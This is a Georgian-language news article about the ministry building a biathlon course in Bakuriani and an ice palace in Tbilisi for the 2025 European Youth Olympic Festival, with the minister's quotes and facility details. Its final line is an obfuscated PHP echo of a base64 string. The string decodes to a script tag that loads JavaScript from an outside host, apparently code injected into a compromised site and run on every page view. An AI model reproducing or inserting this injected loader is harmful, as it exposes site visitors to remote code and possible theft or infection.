celsiusi
ავერსი შნაიდერი

2025 წელს საქართველო ევროპის ზამთრის ოლიმპიურ ფესტივალს უმასპინძლებს, რისთვისაც ბაკურიანში ბიატლონის ინფრასტრუქტურა შენდება, ხოლო თბილისში - ყინულის სასახლე, - ამის შესახებ რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრმა, ირაკლი ქარსელაძემ ბაკურიანსა და თბილისში სპორტული ინფრასტრუქტურის მშენებლობის სამუშაოების მონახულების შემდეგ განაცხადა.

მისივე თქმით, პროექტირებისა და სამუშაოების წარმოებისას სრულად არის დაცული საერთაშორისო ოლიმპიური კომიტეტის, აბსოლუტურად, ყველა და სტანდარტი მოთხოვნა.
„მჭიდრო თანამშრომლობისა და პერიოდული მისიების ფარგლებში, კომიტეტთან თანხმდება ნებისმიერი საკითხი. ამ პროექტების შედეგად, ქვეყანას ექნება ოლიმპიური სტანდარტის ინფრასტრუქტურა, რომელიც არა მხოლოდ ფესტივალის მიზნებისთვის, არამედ სპორტის შესაბამისი სახეობების განვითარებისთვის დიდ როლს შეასრულებს“, - აღნიშნა მინისტრმა.
რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს ცნობით, 2025 წლის ევროპის ზამთრის ახალგაზრდული ოლიმპიური ფესტივალისთვის, რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს მუნიციპალური განვითარების ფონდი დაბა ბაკურიანში ბიატლონისა და თხილამურებით რბოლის (Cross Country) მოედანს და 3.5 კმ სიგრძის ტრასას, ხოლო თბილისში ყინულის სასახლეს აშენებს.
მათივე ცნობით, ბაკურიანში ბიატლონის და თხილამურებით რბოლის ტრასების და მათთან დაკავშირებული ინფრასტრუქტურის მოწყობის სამუშაოები აქტიურად მიმდინარეობს. რბოლის ტრასების ხელოვნური გათოვლიანებისთვის ეწყობა წყალმომარაგებისა და ელექტრო სისტემებიც. დასრულების ეტაპზეა თბილისის ყინულის სასახლის კონსტრუქციული ნაწილის მშენებლობა და სამუშაოები ორივე პროექტზე მიმდინარე წლის ბოლოს დასრულდება.
„სუსტ გრუნტთან და გეოლოგიურ სირთულეებთან დაკავშირებული გამოწვევების მიუხედავად, ბიატლონის ტრასის მიწის სამუშაოების 100% და ხელოვნური ნაგებობების მოწყობის 70% დასრულებულია. ასევე, სრულდება ყინულის სასახლის გადახურვის სამუშაოები, რითაც დასრულდება შენობის კონსტრუქციული ნაწილის მშენებლობა და დაიწყება საინჟინრო სისტემების მონტაჟი საერთაშორისო საუკეთესო პრაქტიკის შესაბამისად. ორივე ინფრასტრუქტურა, აუცილებელი სტანდარტის სრული დაცვით, მზად იქნება 2025 წლის ევროპის ზამთრის ფესტივალის ღირსეული მასპინძლობისთვის“, - აღნიშნა ირაკლი ქარსელაძემ.
„ჰოკეის, ფიგურული სრიალისა და კერლინგის სპორტის სახეობებისთვის გათვლილი თბილისის ყინულის სასახლე 700-მდე მაყურებელზეა გათვლილი. სასახლის შენობაში მოეწყობა ყინულის მოედანი (60მX30მ), სავარჯიშო, ქორეოგრაფიული, საგრიმიორო და საკონფერენციო დარბაზები, გასახდელები, ინვენტარის შესანახი, დასასვენებელი, სამედიცინო ოთახები და სველი წერტილები. ასევე, გათვალისწინებულია კაფე - მოედნის პანორამული ხედით და ავტოსადგომი. შენობაში მონტაჟდება გაგრილების სისტემა, რომელიც უზრუნველყოფს სხვადასხვა ტემპერატურულ რეჟიმს და ყინულის საფარის გაგრილებასთან ერთად, არეგულირებს ტენიანობის დონესა და მაყურებელთა სივრცის გათბობას. მოედანზე დამონტაჟდება ორი ტაბლო და განათების სისტემა. მრავალფუნქციური სპორტული კომპლექსი სრულად იქნება ადაპტირებული შეზღუდული შესაძლებლობების მქონე პირებისთვის.
ყინულის სასახლე აღიჭურვება თანამედროვე (ევროპული წარმოების) ორი ერთეული ყინულის მოედნის მოსავლელი და საპრიალებელი მანქანა-დანადგარით. ასევე, სპეციალიზებული იატაკის იზოლირებული საფარით, რომლის საშუალებითაც, ყინულის საფარის გადნობის გარეშე, მოედანი მოემსახურება საზაფხულო სპორტის სახეობებსა და სხვა სახის ღონისძიებებს (კალათბურთი, მინი ფეხბურთი, ხელბურთი და ა.შ).
ყინულის სასახლის უახლესი და საერთაშორისო სტანდარტების შესაბამისი ტექნოლოგიებით აღჭურვას და მონტაჟს და ჩეხური კომპანია უზრუნველყოფს.
პროექტები სახელმწიფო ბიუჯეტიდან 50 მილიონ ლარზე მეტით ფინანსდება“, - აღნიშნულია ინფორმაციაში.
90
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");